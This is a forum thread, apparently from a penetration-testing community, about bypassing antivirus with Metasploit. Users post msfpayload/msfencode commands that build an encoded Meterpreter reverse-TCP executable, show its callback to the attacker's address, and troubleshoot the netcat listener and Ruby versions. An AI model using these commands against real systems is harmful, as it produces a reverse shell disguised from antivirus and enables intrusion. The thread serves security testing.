12 replies to this topic

[webdevil]

http://in.youtube.co...metasploit.html

Power of Metasploit!

[packet]

That's a great demonstration. Good AV stops me about a third of the time when doing a Pentest so I'm always looking for good ways to get around it. Also when I am able to evade it I can show that one should not rely on AV alone and make a very good practical demonstration for defense in depth.

I've been pretty happy overall with the new 3.2 framework. Thanks for posting the video

--P>G>>

[webdevil]

Bypassing the AV's is I believe a new extension to exploitation, AV's are becoming smarter but not the smartest
Moreover Metasploit is moving into alot of diversity, like DiderStevens building them a module for pdf exploits etc.

[berz3k]

Doesn't work!

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
[-] Invalid format: exe

:-(

-berz3k.

[webdevil]

I believe this is only supported with the latest version (or is it still not in the main trunk??)
Do an SVN update and check once more.

[berz3k]

Doesn't work! (Win32 Vista)

$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
   
   ***********************************************************************
   ***																   *
   *** This version of the Ruby interpreter has significant problems, we *
   *** strongly recommend that you switch to version 1.8.6 until these   *
   *** issues have been corrected. Alternatively, you can download,	  *
   *** build, and install the latest Ruby snapshot from:				 *
   ***  - http://www.ruby-lang.org/									  *
   *** For more information, please see the following URL:			   *
   ***  - https://bugs.launchpad.net/bugs/282302						 *
   ***																   *
   ***********************************************************************
   
   [*] x86/shikata_ga_nai succeeded, final size 76
   
   intrusa@x ~/MSF/trunk
   $ chmod 777 meterpreter.exe

----------------------------------
Works fine over Unix port MACOX x86
----------------------------------

Creating the .exe file

sh-3.2# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
 [*] x86/shikata_ga_nai succeeded, final size 306

meterpreter.exe executed (Victim)

C:\>netstat -an
   
   Active Connections
   
	 Proto  Local Address		  Foreign Address		State
	 TCP	0.0.0.0:25			 0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:135			0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:445			0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1025		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1026		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1027		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1032		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1040		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:1910		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:3372		   0.0.0.0:0			  LISTENING
	 TCP	0.0.0.0:4899		   0.0.0.0:0			  LISTENING
	 TCP	127.0.0.1:1903		 127.0.0.1:1902		 TIME_WAIT
	 TCP	172.18.0.27:139		0.0.0.0:0			  LISTENING
	 TCP	172.18.0.27:1910	   172.20.40.32:8080	  ESTABLISHED <----kool
	 UDP	0.0.0.0:135			*:*
	 UDP	0.0.0.0:401			*:*
	 UDP	0.0.0.0:402			*:*
	 UDP	0.0.0.0:445			*:*
	 UDP	0.0.0.0:1028		   *:*
	 UDP	0.0.0.0:1030		   *:*
	 UDP	0.0.0.0:3456		   *:*
	 UDP	172.18.0.27:137		*:*
	 UDP	172.18.0.27:138		*:*

Listen port (intruder)

C:\>nc -lp 8080
   
   c:\>	<---- Broken mmmm

Doesn't work! :-( does any1 know why?

-berz3k.

[DidierStevens]

Doesn't work! (Win32 Vista)

***********************************************************************
*** *
*** This version of the Ruby interpreter has significant problems, we *
*** strongly recommend that you switch to version 1.8.6 until these *
*** issues have been corrected. Alternatively, you can download, *
*** build, and install the latest Ruby snapshot from: *
*** - http://www.ruby-lang.org/ *
*** For more information, please see the following URL: *
*** - https://bugs.launchpad.net/bugs/282302 *
*** *
***********************************************************************

The explanation is right in the error message. msf needs Ruby 1.8.6. You probably downloaded the lastest Ruby Windows install from the Ruby site, which is 1.8.7. You need to remove this Ruby version and install 1.8.6.

[webdevil]

@berz3k
I am not sure what you are trying?
you build the exe on the linux host with ip 172.20.40.32 and test on a vista host with ip 172.18.0.27. You build a reverse tcp connect shell and check for the reverse shell on the windows host??

@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.

[DidierStevens]

@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.

I used msf with Ruby 1.8.7 on a Windows XP box and didn't work, had to downgrade to 1.8.6. Was about a month ago.

[hamamo]

this is a kind of how is getting smarter

[hamamo]

by the way
nice VD and good job

[berz3k]

@DidierStevens

thanks for the info dude! , now i am changing the version ruby

@Webdevil

1)The meterpreter.exe builded over MACOSX/x86 (port) with reverse_tcp and 172.20.40.32 address and port 8080 works fine.

2) Then i was put the meterpreter.exe on the victim (172.18.0.27 win2k server) and i saw the connection TCP 8080 u can see the intruder address (172.20.40.32:8080), works fine using netstat.

BUT!!!

3) The intruder machine (172.20.40.32), I'm listening 8080 port nc -lp 8080 and the connection is broken :-(


-berz3k.

[zeknox]

Bypassing AV with metasploit is a hot topic and there are a few different methods to attack this. I feel this article is one of the best methods for evading AV considering it gives the tester plenty of flexibility in obfuscating ASM instructions and allows for bypassing of Static Binary Analysis and Heuristic based AV engines.

http://www.pentestge...st-writing-asm/

Hope this helps!